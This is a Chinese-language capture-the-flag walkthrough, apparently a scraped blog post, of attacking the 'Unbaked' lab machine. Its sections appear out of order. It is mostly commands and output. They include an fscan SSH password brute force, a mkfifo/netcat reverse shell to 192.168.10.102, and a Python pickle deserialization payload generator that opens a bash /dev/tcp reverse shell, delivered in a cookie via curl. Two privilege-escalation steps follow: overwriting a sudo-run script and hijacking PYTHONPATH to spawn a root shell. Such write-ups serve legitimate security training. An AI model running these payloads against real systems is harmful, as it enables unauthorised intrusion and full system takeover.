.\/fscan -h 172.17.0.1 -user ramsey\n.\/fscan: \/lib\/x86_64-linux-gnu\/libc.so.6: version `GLIBC_2.32' not found (required by .\/fscan)\n.\/fscan: \/lib\/x86_64-linux-gnu\/libc.so.6: version `GLIBC_2.34' not found (required by .\/fscan)<\/code><\/pre>\n\u5c1d\u8bd5\u66f4\u6362\u7248\u672c\uff1ahttps:\/\/github.com\/shadow1ng\/fscan\/releases\/download\/1.3.1\/fscan_amd64<\/a><\/p>\n(remote) root@8b39a559b296:\/tmp# .\/fscan_amd64 -h 172.17.0.1 -user ramsey\n\n ___ _ \n \/ _ \\ ___ ___ _ __ __ _ ___| | __\n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__| <\n\\____\/ |___\/\\___|_| \\__,_|\\___|_|\\_\\\nscan start\n(ICMP) Target '172.17.0.1' is alive\nicmp alive hosts len is: 1\n172.17.0.1:22 open\nSSH:172.17.0.1:22:ramsey 12345678\nscan end<\/code><\/pre>\n\u5c1d\u8bd5\u8fde\u63a5\u53cd\u5f39shell\uff01<\/p>\n
.\/fscan_amd64 -h 172.17.0.1 -user ramsey -pwd "12345678" -c "rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc 192.168.10.102 1234 >\/tmp\/f"<\/code><\/pre>\n<\/div>
\n<\/div><\/p>\n\u8986\u76d6\u6587\u4ef6\u63d0\u6743<\/h3>\n(remote) ramsey@unbaked:\/home\/ramsey$ cat \/etc\/passwd | grep sh\nroot:x:0:0:root:\/root:\/bin\/bash\nsshd:x:110:65534::\/var\/run\/sshd:\/usr\/sbin\/nologin\nramsey:x:1001:1001::\/home\/ramsey:\/bin\/bash\noliver:x:1002:1002::\/home\/oliver:\/bin\/bash\n(remote) ramsey@unbaked:\/home\/ramsey$ sudo -l\n[sudo] password for ramsey: \nMatching Defaults entries for ramsey on unbaked:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser ramsey may run the following commands on unbaked:\n (oliver) \/usr\/bin\/python \/home\/ramsey\/vuln.py\n(remote) ramsey@unbaked:\/home\/ramsey$ cat \/home\/ramsey\/vuln.py\n#!\/usr\/bin\/python\n# coding=utf-8\n\ntry:\n from PIL import Image\nexcept ImportError:\n import Image\nimport pytesseract\nimport sys\nimport os\nimport time\n\n#Header\ndef header():\n banner = '''\\033[33m \n (\n )\n __..---..__\n ,-=' \/ | \\ `=-.\n :--..___________..--;\n \\.,_____________,.\/\n\n\u2588\u2588\u2557\u2588\u2588\u2588\u2557 \u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\n\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551\u255a\u2550\u2550\u2588\u2588\u2554\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\n\u2588\u2588\u2551\u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2554\u2588\u2588\u2557 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\n\u2588\u2588\u2551\u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2551\u255a\u2588\u2588\u2557\u2588\u2588\u2551 \u2588\u2588\u2551 \u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\n\u2588\u2588\u2551\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2551 \u255a\u2588\u2588\u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\n\u255a\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u2550\u2550\u255d \u255a\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\\033[m'''\n return banner\n\n#Function Instructions\ndef instructions():\n print "\\n\\t\\t\\t",9 * "-" , "WELCOME!" , 9 * "-"\n print "\\t\\t\\t","1. Calculator"\n print "\\t\\t\\t","2. Easy Calculator"\n print "\\t\\t\\t","3. Credits"\n print "\\t\\t\\t","4. Exit"\n print "\\t\\t\\t",28 * "-"\n\ndef instructions2():\n print "\\n\\t\\t\\t",9 * "-" , "CALCULATOR!" , 9 * "-"\n print "\\t\\t\\t","1. Add"\n print "\\t\\t\\t","2. Subtract"\n print "\\t\\t\\t","3. Multiply"\n print "\\t\\t\\t","4. Divide"\n print "\\t\\t\\t","5. Back"\n print "\\t\\t\\t",28 * "-"\n\ndef credits():\n print "\\n\\t\\tHope you enjoy learning new things - Ch4rm & H0j3n\\n"\n\n# Function Arithmetic\n\n# Function to add two numbers \ndef add(num1, num2): \n return num1 + num2 \n\n# Function to subtract two numbers \ndef subtract(num1, num2): \n return num1 - num2 \n\n# Function to multiply two numbers \ndef multiply(num1, num2): \n return num1 * num2 \n\n# Function to divide two numbers \ndef divide(num1, num2): \n return num1 \/ num2 \n# Main \nif __name__ == "__main__":\n print header()\n\n #Variables\n OPTIONS = 0\n OPTIONS2 = 0\n TOTAL = 0\n NUM1 = 0\n NUM2 = 0\n\n while(OPTIONS != 4):\n instructions()\n OPTIONS = int(input("\\t\\t\\tEnter Options >> "))\n print "\\033c"\n if OPTIONS == 1:\n instructions2()\n OPTIONS2 = int(input("\\t\\t\\tEnter Options >> "))\n print "\\033c"\n if OPTIONS2 == 5:\n continue\n else:\n NUM1 = int(input("\\t\\t\\tEnter Number1 >> "))\n NUM2 = int(input("\\t\\t\\tEnter Number2 >> "))\n if OPTIONS2 == 1:\n TOTAL = add(NUM1,NUM2)\n if OPTIONS2 == 2:\n TOTAL = subtract(NUM1,NUM2)\n if OPTIONS2 == 3:\n TOTAL = multiply(NUM1,NUM2)\n if OPTIONS2 == 4:\n TOTAL = divide(NUM1,NUM2)\n print "\\t\\t\\tTotal >> $",TOTAL\n if OPTIONS == 2:\n animation = ["[\u25a0\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1]","[\u25a0\u25a0\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1]", "[\u25a0\u25a0\u25a0\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1]", "[\u25a0\u25a0\u25a0\u25a0\u25a1\u25a1\u25a1\u25a1\u25a1\u25a1]", "[\u25a0\u25a0\u25a0\u25a0\u25a0\u25a1\u25a1\u25a1\u25a1\u25a1]", "[\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a1\u25a1\u25a1\u25a1]", "[\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a1\u25a1\u25a1]", "[\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a1\u25a1]", "[\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a1]", "[\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0\u25a0]"]\n\n print "\\r\\t\\t\\t Waiting to extract..."\n for i in range(len(animation)):\n time.sleep(0.5)\n sys.stdout.write("\\r\\t\\t\\t " + animation[i % len(animation)])\n sys.stdout.flush()\n\n LISTED = pytesseract.image_to_string(Image.open('payload.png')) \n\n TOTAL = eval(LISTED)\n print "\\n\\n\\t\\t\\tTotal >> $",TOTAL\n if OPTIONS == 3:\n credits()\n sys.exit(-1)<\/code><\/pre>\n\u867d\u7136\u770b\u4e0a\u53bb\u4e0d\u53ef\u4ee5\u4fee\u6539\uff0c\u4f46\u662f\u7531\u4e8e\u5176\u5728\u5bb6\u76ee\u5f55\u4e0b\u6240\u4ee5\u5c31\u662f\u6848\u677f\u4e0a\u7684\u8089\u4e86\uff1a<\/p>\n
(remote) ramsey@unbaked:\/home\/ramsey$ ls -la \/home\/ramsey\/vuln.py\n-rw-r--r-- 1 root ramsey 4369 Oct 3 2020 \/home\/ramsey\/vuln.py<\/code><\/pre>\n\u76f4\u63a5\u8986\u76d6\u6389\uff0c\u7136\u540e\u6267\u884c\uff01<\/p>\n
(remote) ramsey@unbaked:\/home\/ramsey$ mv vuln.py vuln.py.bak\n(remote) ramsey@unbaked:\/home\/ramsey$ echo 'import pty;pty.spawn("\/bin\/bash")' > vuln.py\n(remote) ramsey@unbaked:\/home\/ramsey$ chmod +x vuln.py\n(remote) ramsey@unbaked:\/home\/ramsey$ sudo -u oliver \/usr\/bin\/python \/home\/ramsey\/vuln.py\noliver@unbaked:~$ <\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h3>\noliver@unbaked:~$ sudo -l\nMatching Defaults entries for oliver on unbaked:\n env_reset, mail_badpass,\n secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser oliver may run the following commands on unbaked:\n (root) SETENV: NOPASSWD: \/usr\/bin\/python \/opt\/dockerScript.py\noliver@unbaked:~$ cat \/opt\/dockerScript.py\nimport docker\n\n# oliver, make sure to restart docker if it crashes or anything happened.\n# i havent setup swap memory for it\n# it is still in development, please dont let it live yet!!!\nclient = docker.from_env()\nclient.containers.run("python-django:latest", "sleep infinity", detach=True)<\/code><\/pre>\n\u56e0\u4e3a\u53ef\u4ee5\u8bbe\u7f6e\u73af\u5883\uff0c\u6240\u4ee5\u53ef\u4ee5\u5c1d\u8bd5\u52ab\u6301\u73af\u5883\u53d8\u91cf\u548c\u5e93\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n
oliver@unbaked:~$ cd \/tmp\noliver@unbaked:\/tmp$ echo 'import pty;pty.spawn("\/bin\/bash")' > docker.py\noliver@unbaked:\/tmp$ sudo PYTHONPATH=\/tmp python \/opt\/dockerScript.py\nroot@unbaked:\/tmp# cd \/root\nroot@unbaked:\/root# ls -la\ntotal 32\ndrwx------ 4 root root 4096 Oct 3 2020 .\ndrwxr-xr-x 23 root root 4096 Oct 3 2020 ..\n-rw------- 1 root root 39 Oct 5 2020 .bash_history\n-rw-r--r-- 1 root root 3106 Oct 23 2015 .bashrc\ndrwx------ 3 root root 4096 Oct 3 2020 .cache\ndrwxr-xr-x 2 root root 4096 Oct 3 2020 .nano\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\n-rw-r--r-- 1 root root 129 Oct 3 2020 root.txt\nroot@unbaked:\/root# cat root.txt \nCONGRATS ON PWNING THIS BOX!\nCreated by ch4rm & H0j3n\nps: dont be mad us, we hope you learn something new\n\nflag: Unb4ked_GOtcha!<\/code><\/pre>\n\u53c2\u8003<\/h2>\n
https:\/\/nullvector0.notion.site\/unbaked-5c37935d31c240c28c4878c6c9d66c09<\/a><\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/UnbakedPie]\n\u2514\u2500$ sudo nmap -Pn $IP -sT -sC -sV\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-09-12 05:59 EDT\nNmap scan report for 192.168.10.101\nHost is up (0.0015s latency).\nNot shown: 999 filtered tcp ports (no-response)\nPORT STATE SERVICE VERSION\n5003\/tcp open filemaker?\n| fingerprint-strings: \n| GetRequest: \n| HTTP\/1.1 200 OK\n| Date: Thu, 12 Sep 2024 10:00:34 GMT\n| Server: WSGIServer\/0.2 CPython\/3.8.6\n| Content-Type: text\/html; charset=utf-8\n| X-Frame-Options: DENY\n| Vary: Cookie\n| Content-Length: 7453\n| X-Content-Type-Options: nosniff\n| Referrer-Policy: same-origin\n| Set-Cookie: csrftoken=1GqVxL3Xg2RAPEUtHsTjTI70ZYNyU2xzcxzW4C4Dz6gcNtRTI9yPieGHHZ5KnmEm; expires=Thu, 11 Sep 2025 10:00:34 GMT; Max-Age=31449600; Path=\/; SameSite=Lax\n| <!DOCTYPE html>\n| <html lang="en">\n| <head>\n| <meta charset="utf-8">\n| <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">\n| <meta name="description" content="">\n| <meta name="author" content="">\n| <title>[Un]baked | \/<\/title>\n| <!-- Bootstrap core CSS -->\n| <link href="\/static\/vendor\/bootstrap\/css\/bootstrap.min.css" rel="stylesheet">\n| <!-- Custom fonts for this template -->\n| <link href="\/static\/vendor\/fontawesome-free\/css\/all.min.cs\n| HTTPOptions: \n| HTTP\/1.1 200 OK\n| Date: Thu, 12 Sep 2024 10:00:34 GMT\n| Server: WSGIServer\/0.2 CPython\/3.8.6\n| Content-Type: text\/html; charset=utf-8\n| X-Frame-Options: DENY\n| Vary: Cookie\n| Content-Length: 7453\n| X-Content-Type-Options: nosniff\n| Referrer-Policy: same-origin\n| Set-Cookie: csrftoken=VQn25UJjqBTqik38fcqFs20zpMtiRU5AoJUvuyG1X06sIHUpAh29nEhJyxKLzCBw; expires=Thu, 11 Sep 2025 10:00:34 GMT; Max-Age=31449600; Path=\/; SameSite=Lax\n| <!DOCTYPE html>\n| <html lang="en">\n| <head>\n| <meta charset="utf-8">\n| <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">\n| <meta name="description" content="">\n| <meta name="author" content="">\n| <title>[Un]baked | \/<\/title>\n| <!-- Bootstrap core CSS -->\n| <link href="\/static\/vendor\/bootstrap\/css\/bootstrap.min.css" rel="stylesheet">\n| <!-- Custom fonts for this template -->\n|_ <link href="\/static\/vendor\/fontawesome-free\/css\/all.min.cs\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port5003-TCP:V=7.94SVN%I=7%D=9\/12%Time=66E2BBBB%P=x86_64-pc-linux-gnu%r\nSF:(GetRequest,1EC5,"HTTP\/1\\.1\\x20200\\x20OK\\r\\nDate:\\x20Thu,\\x2012\\x20Sep\\\nSF:x202024\\x2010:00:34\\x20GMT\\r\\nServer:\\x20WSGIServer\/0\\.2\\x20CPython\/3\\.\nSF:8\\.6\\r\\nContent-Type:\\x20text\/html;\\x20charset=utf-8\\r\\nX-Frame-Options\nSF::\\x20DENY\\r\\nVary:\\x20Cookie\\r\\nContent-Length:\\x207453\\r\\nX-Content-Ty\nSF:pe-Options:\\x20nosniff\\r\\nReferrer-Policy:\\x20same-origin\\r\\nSet-Cookie\nSF::\\x20\\x20csrftoken=1GqVxL3Xg2RAPEUtHsTjTI70ZYNyU2xzcxzW4C4Dz6gcNtRTI9yP\nSF:ieGHHZ5KnmEm;\\x20expires=Thu,\\x2011\\x20Sep\\x202025\\x2010:00:34\\x20GMT;\\\nSF:x20Max-Age=31449600;\\x20Path=\/;\\x20SameSite=Lax\\r\\n\\r\\n\\n<!DOCTYPE\\x20h\nSF:tml>\\n<html\\x20lang=\\"en\\">\\n\\n<head>\\n\\n\\x20\\x20<meta\\x20charset=\\"utf\nSF:-8\\">\\n\\x20\\x20<meta\\x20name=\\"viewport\\"\\x20content=\\"width=device-wid\nSF:th,\\x20initial-scale=1,\\x20shrink-to-fit=no\\">\\n\\x20\\x20<meta\\x20name=\\\nSF:"description\\"\\x20content=\\"\\">\\n\\x20\\x20<meta\\x20name=\\"author\\"\\x20co\nSF:ntent=\\"\\">\\n\\n\\x20\\x20<title>\\[Un\\]baked\\x20\\|\\x20\/<\/title>\\n\\n\\x20\\x2\nSF:0<!--\\x20Bootstrap\\x20core\\x20CSS\\x20-->\\n\\x20\\x20<link\\x20href=\\"\/stat\nSF:ic\/vendor\/bootstrap\/css\/bootstrap\\.min\\.css\\"\\x20rel=\\"stylesheet\\">\\n\\\nSF:n\\x20\\x20<!--\\x20Custom\\x20fonts\\x20for\\x20this\\x20template\\x20-->\\n\\x2\nSF:0\\x20<link\\x20href=\\"\/static\/vendor\/fontawesome-free\/css\/all\\.min\\.cs")\nSF:%r(HTTPOptions,1EC5,"HTTP\/1\\.1\\x20200\\x20OK\\r\\nDate:\\x20Thu,\\x2012\\x20S\nSF:ep\\x202024\\x2010:00:34\\x20GMT\\r\\nServer:\\x20WSGIServer\/0\\.2\\x20CPython\/\nSF:3\\.8\\.6\\r\\nContent-Type:\\x20text\/html;\\x20charset=utf-8\\r\\nX-Frame-Opti\nSF:ons:\\x20DENY\\r\\nVary:\\x20Cookie\\r\\nContent-Length:\\x207453\\r\\nX-Content\nSF:-Type-Options:\\x20nosniff\\r\\nReferrer-Policy:\\x20same-origin\\r\\nSet-Coo\nSF:kie:\\x20\\x20csrftoken=VQn25UJjqBTqik38fcqFs20zpMtiRU5AoJUvuyG1X06sIHUpA\nSF:h29nEhJyxKLzCBw;\\x20expires=Thu,\\x2011\\x20Sep\\x202025\\x2010:00:34\\x20GM\nSF:T;\\x20Max-Age=31449600;\\x20Path=\/;\\x20SameSite=Lax\\r\\n\\r\\n\\n<!DOCTYPE\\x\nSF:20html>\\n<html\\x20lang=\\"en\\">\\n\\n<head>\\n\\n\\x20\\x20<meta\\x20charset=\\"\nSF:utf-8\\">\\n\\x20\\x20<meta\\x20name=\\"viewport\\"\\x20content=\\"width=device-\nSF:width,\\x20initial-scale=1,\\x20shrink-to-fit=no\\">\\n\\x20\\x20<meta\\x20nam\nSF:e=\\"description\\"\\x20content=\\"\\">\\n\\x20\\x20<meta\\x20name=\\"author\\"\\x2\nSF:0content=\\"\\">\\n\\n\\x20\\x20<title>\\[Un\\]baked\\x20\\|\\x20\/<\/title>\\n\\n\\x20\nSF:\\x20<!--\\x20Bootstrap\\x20core\\x20CSS\\x20-->\\n\\x20\\x20<link\\x20href=\\"\/s\nSF:tatic\/vendor\/bootstrap\/css\/bootstrap\\.min\\.css\\"\\x20rel=\\"stylesheet\\">\nSF:\\n\\n\\x20\\x20<!--\\x20Custom\\x20fonts\\x20for\\x20this\\x20template\\x20-->\\n\nSF:\\x20\\x20<link\\x20href=\\"\/static\/vendor\/fontawesome-free\/css\/all\\.min\\.c\nSF:s");<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/UnbakedPie]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP:5003 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -d 3 -s 200 301 302\n ___ ___ __ __ __ __ __ ___\n|__ |__ |__) |__) | \/ ` \/ \\ \\_\/ | | \\ |__\n| |___ | \\ | \\ | \\__, \\__\/ \/ \\ | |__\/ |___\nby Ben "epi" Risher \ud83e\udd13 ver: 2.10.4\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf Target Url \u2502 http:\/\/192.168.10.101:5003\n \ud83d\ude80 Threads \u2502 50\n \ud83d\udcd6 Wordlist \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c Status Codes \u2502 [200, 301, 302]\n \ud83d\udca5 Timeout (secs) \u2502 7\n \ud83e\udda1 User-Agent \u2502 feroxbuster\/2.10.4\n \ud83d\udc89 Config File \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e Extract Links \u2502 true\n \ud83c\udfc1 HTTP methods \u2502 [GET]\n \ud83d\udd03 Recursion Depth \u2502 3\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1 Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n200 GET 165l 384w 5457c http:\/\/192.168.10.101:5003\/german-chocolate-pie\n200 GET 7l 1029w 81084c http:\/\/192.168.10.101:5003\/static\/vendor\/bootstrap\/js\/bootstrap.bundle.min.js\n200 GET 5l 83w 58578c http:\/\/192.168.10.101:5003\/static\/vendor\/fontawesome-free\/css\/all.min.css\n200 GET 7l 26w 1092c http:\/\/192.168.10.101:5003\/static\/js\/clean-blog.min.js\n200 GET 157l 433w 5619c http:\/\/192.168.10.101:5003\/blueberry-pie\n200 GET 162l 511w 6150c http:\/\/192.168.10.101:5003\/homemade-pickle\n200 GET 141l 343w 4949c http:\/\/192.168.10.101:5003\/about\n200 GET 323l 1639w 150557c http:\/\/192.168.10.101:5003\/media\/apple-pie.jpg\n200 GET 5l 169w 6376c http:\/\/192.168.10.101:5003\/static\/css\/clean-blog.min.css\n200 GET 163l 488w 5958c http:\/\/192.168.10.101:5003\/pickle-pie\n200 GET 366l 2045w 188693c http:\/\/192.168.10.101:5003\/media\/bluberry-pie.jpg\n200 GET 2l 1297w 89476c http:\/\/192.168.10.101:5003\/static\/vendor\/jquery\/jquery.min.js\n200 GET 7l 2102w 160403c http:\/\/192.168.10.101:5003\/static\/vendor\/bootstrap\/css\/bootstrap.min.css\n200 GET 832l 3648w 310445c http:\/\/192.168.10.101:5003\/media\/429048911_6028786357001_6028781673001-vs.jpg\n200 GET 0l 0w 78946c http:\/\/192.168.10.101:5003\/media\/best-homemade-refrigerator-pickles-21.jpg\n200 GET 0l 0w 201616c http:\/\/192.168.10.101:5003\/media\/germanchocolatepie.jpg\n200 GET 225l 514w 7453c http:\/\/192.168.10.101:5003\/\n301 GET 0l 0w 0c http:\/\/192.168.10.101:5003\/accounts\/signup => http:\/\/192.168.10.101:5003\/accounts\/signup\/\n301 GET 0l 0w 0c http:\/\/192.168.10.101:5003\/accounts\/login => http:\/\/192.168.10.101:5003\/accounts\/login\/\n302 GET 0l 0w 0c http:\/\/192.168.10.101:5003\/share => accounts\/login?next=\/share<\/code><\/pre>\n\u6ca1\u6709\u7ee7\u7eed\u626b\u4e0b\u53bb\u4e86\uff0c\u5982\u679c\u7b49\u4e00\u4e0b\u627e\u4e0d\u5230\u7a81\u7834\u53e3\u518d\u626b\u63cf\u5427\u3002<\/p>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/UnbakedPie]\n\u2514\u2500$ curl -is http:\/\/$IP:5003 \nHTTP\/1.1 200 OK\nDate: Thu, 12 Sep 2024 10:01:23 GMT\nServer: WSGIServer\/0.2 CPython\/3.8.6\nContent-Type: text\/html; charset=utf-8\nX-Frame-Options: DENY\nVary: Cookie\nContent-Length: 7453\nX-Content-Type-Options: nosniff\nReferrer-Policy: same-origin\nSet-Cookie: csrftoken=sLJZaCVfzmB8xU5b8mxMAn3yTVyJQUVPDKwW5QhJ1ujLJRXGlcycTmP8c7n4zMp9; expires=Thu, 11 Sep 2025 10:01:23 GMT; Max-Age=31449600; Path=\/; SameSite=Lax\n\n<!DOCTYPE html>\n<html lang="en">\n\n<head>\n\n <meta charset="utf-8">\n <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <title>[Un]baked | \/<\/title>\n\n <!-- Bootstrap core CSS -->\n .................\n <!-- Bootstrap core JavaScript -->\n <script src="\/static\/vendor\/jquery\/jquery.min.js"><\/script>\n <script src="\/static\/vendor\/bootstrap\/js\/bootstrap.bundle.min.js"><\/script>\n\n <!-- Custom scripts for this template -->\n <script src="\/static\/js\/clean-blog.min.js"><\/script>\n\n<\/body>\n\n<\/html><\/code><\/pre>\n<\/div><\/p>\n\u5c1d\u8bd5\u641c\u7d22\uff0c\u53d1\u73b0\u6e90\u4ee3\u7801\u6570\u636e\u975e\u5e38\u591a\uff0c\u8fd8\u6709\u4e0d\u5c11\u7684\u9690\u85cf\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\npickle \u53cd\u5e8f\u5217\u5316\uff1f<\/p>\n
<\/div><\/p>\n\u77e5\u9053\u4e86\u7248\u672c\u4fe1\u606f\uff0cDjango Version: 3.1.2 Python Version: 3.8.6<\/code><\/p>\n<\/div>
\n<\/div>
\n<\/div><\/p>\n\u53d1\u73b0\u4e86\u4e00\u4e2acookie\uff1f<\/p>\n
# gASVCAAAAAAAAACMBHRlc3SULg==\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/UnbakedPie]\n\u2514\u2500$ echo 'gASVCAAAAAAAAACMBHRlc3SULg==' | base64 -d \n\ufffd\ufffdtest\ufffd.<\/code><\/pre>\n\u5c1d\u8bd5\u4e00\u4e0bpickle<\/code>\u53cd\u5e8f\u5217\u5316\uff0c\u770b\u662f\u5426\u548c\u4e0a\u9762\u8868\u793a\u4e00\u6837\uff01<\/p>\nimport pickle\nimport base64\nimport os\n\nclass PickleCommandExec:\n def __reduce__(self):\n command = ('test')\n return os.system, (command,)\n\nif __name__ == '__main__':\n pickled = pickle.dumps(PickleCommandExec())\n print(base64.urlsafe_b64encode(pickled))\n\n# b'gASVHwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAR0ZXN0lIWUUpQu'<\/code><\/pre>\n\u770b\u4e0a\u53bb\u8fd8\u86ee\u50cf\u7684\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u6267\u884c\u547d\u4ee4\uff01<\/p>\n
import pickle\nimport base64\nimport os\n\nclass PickleCommandExec:\n def __reduce__(self):\n command = ('bash -c "exec bash -i &>\/dev\/tcp\/192.168.10.102\/1234 <&1"')\n return os.system, (command,)\n\nif __name__ == '__main__':\n pickled = pickle.dumps(PickleCommandExec())\n print(base64.urlsafe_b64encode(pickled))\n# b'gASVVAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjDliYXNoIC1jICJleGVjIGJhc2ggLWkgJj4vZGV2L3RjcC8xOTIuMTY4LjEwLjEwMi8xMjM0IDwmMSKUhZRSlC4='<\/code><\/pre>\n\u5c1d\u8bd5\u6fc0\u6d3b\u4e00\u4e0b\uff1a<\/p>\n
curl -is http:\/\/$IP:5003\/search -b "search_cookie=gASVVAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjDliYXNoIC1jICJleGVjIGJhc2ggLWkgJj4vZGV2L3RjcC8xOTIuMTY4LjEwLjEwMi8xMjM0IDwmMSKUhZRSlC4="<\/code><\/pre>\n<\/div><\/p>\n\u4e00\u6b65\u5230\u4f4d\uff1f<\/p>\n
